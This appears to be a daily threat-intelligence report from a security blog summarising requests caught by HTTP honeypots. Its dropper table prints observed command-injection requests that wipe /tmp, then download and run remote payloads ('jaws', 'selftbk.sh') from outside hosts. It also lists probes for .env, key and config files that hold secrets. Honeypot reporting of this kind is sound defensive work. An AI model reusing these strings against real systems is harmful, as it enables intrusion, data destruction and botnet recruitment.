Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-07

·515 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 48 new requests that have never been observed before (these were added to the monitored request database.).

A total of 675 requests were recorded during the day, originating from 6 different countries, with a peak of 375 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
41.34.105.247GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
41.45.27.15GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
197.246.60.155GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
8.219.161.97GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
156.195.151.174GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
95.9.44.188GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd+/tmp;wget+http://unjiproxy.p-e.kr:6969/selftbk.sh+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
322GET /config/production.config.php HTTP/1.1
342GET /config/acl.config.php HTTP/1.1
362GET /app/etc/env.local.php HTTP/1.1
372GET /app/etc/config.local.php HTTP/1.1
462GET /config/development.config.php HTTP/1.1
472GET /config/database.config.php HTTP/1.1
542GET /config/module.config.php HTTP/1.1
1741GET /config/security.config.php HTTP/1.1
1811GET /tsconfig.spec.json HTTP/1.1
1821GET /tsconfig.app.json HTTP/1.1
1851GET /bundleconfig.json HTTP/1.1
1861GET /launchSettings.json HTTP/1.1
1871GET /appsettings.Test.json HTTP/1.1
1891GET /appsettings.Development.json HTTP/1.1
1951GET /api/config/tsconfig.json HTTP/1.1
1981GET /private/env.json HTTP/1.1
2001GET /config/environment.json HTTP/1.1
2021GET /src/config/environment.json HTTP/1.1
2031GET /src/config/config.json HTTP/1.1
2041GET /appsettings.Local.json HTTP/1.1
2051GET /appsettings.QA.json HTTP/1.1
2061GET /Properties/launchSettings.json HTTP/1.1
2071GET /meteor.settings.json HTTP/1.1
2081GET /config/env.json HTTP/1.1
2101GET /hosting.json HTTP/1.1
2251GET /conf/application.json HTTP/1.1
2261GET /config/local.json HTTP/1.1
2271GET /config/staging.json HTTP/1.1
2281GET /config/prod.json HTTP/1.1
2401GET /config/daemon.json HTTP/1.1
2511GET /tmp/.env.crt HTTP/1.1
2611GET /mail/.env.db HTTP/1.1
2621GET /dev/.env.old HTTP/1.1
2631GET /dev/.env.uat HTTP/1.1
2641GET /dev/.env.txt HTTP/1.1
2651GET /docs/.env.db HTTP/1.1
2661GET /dev/.env.tmp HTTP/1.1
2681GET /dev/.env.swp HTTP/1.1
2691GET /dev/.env.swo HTTP/1.1
2701GET /dev/.env.swn HTTP/1.1
2731GET /env/keys.yml HTTP/1.1
2741GET /dev/.env.pem HTTP/1.1
2751GET /env/auth.log HTTP/1.1
2761GET /keys/env.yml HTTP/1.1
2921GET /dev/.env_bak HTTP/1.1
3421GET /.env-allowlist HTTP/1.1
3431GET /.env.mail_keys HTTP/1.1
3441GET /.env-react.log HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0375US
173GB
251CN
323RU
415NL
515CH
614DE
711CA
89SC
99VN
108ZA
118PL
126PT
136JP
145HK
155SG
165LT
175ID
185EG
195TR
204BR
214BG
223MD
233IN
242ES
251BE
261GR
271FR
281IT
291KR
301AM

Related

Report: 2025-08-06
·2445 words
Repport Daily
Report: 2025-08-05
·338 words
Repport Daily
Report: 2025-08-04
·393 words
Repport Daily